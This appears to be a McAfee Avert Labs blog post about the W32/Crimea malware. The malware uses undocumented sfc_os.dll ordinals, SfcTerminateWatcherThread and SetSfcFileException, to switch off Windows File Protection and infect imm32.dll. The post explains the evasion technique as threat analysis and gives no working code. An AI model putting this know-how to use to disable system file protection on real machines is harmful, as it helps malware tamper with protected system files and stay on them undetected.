Today, at McAfee Avert Labs we came across an interesting malware, W32/Crimea that uses an undocumented feature of Windows File Protection.
Windows File Protection (WFP) is a feature of the Windows operating system, which prevents other programs from modifying/replacing/deleting critical system files. SFC.dll and SFC_OS.dll are the files that contain the functions used to monitor system files. Earlier malware used to patch these dlls or modify the registries to disable this feature. We had earlier blogged about some of the techniques used by malware targeting Windows Files.
Patching SFC.dll and SFC_OS.dll rendered many some of theÂ system defenses useless, but Anti-Virus companies found out a way to identify these patched dlls and provided remedies to clean the user’s computer from this malice. Again malware authors have found an alternate method with help of undocumented functions in SFC_OS.dll itself.
Those interested explored it, and voila! Didn’t they hit a Jackpot! The important functions that are worth mentioning here are:
1. Ordinal 2: SfcTerminateWatcherThread
2. Ordinal 5: SetSfcFileException
The Ordinal 2 function terminates the System File watcher thread, as the name implies, and the system is open to any directory/file modifications by malware until the next reboot. This method requires the malware to inject code into winlogon.exe in order to call this function, since sfc_os.dll is used by winlogon process to achieve this protection.
Ordinal 5 function disables the WFP for a particular file for one minute normally. This is the time needed by the malware to do their work successfully!!! Now the system is back in form but is infected by the malware. Even though these techniques were out for more than a year, we are seeing these techniques used by malware these days. The second method is used by W32/Crimea to infect a system file imm32.dll.
One might start thinking, why inÂ theÂ world should Microsoft provide such APIs in Windows that makes the operating system vulnerable to many malware. One of the reasons could be to update system files and install the patches. But it does provide a way for the malware to infect the system easily.
Fate it seems, Microsoft is providing a way to disable their own protection using their own APIs. So, is this API a feature? Or it’s a flaw?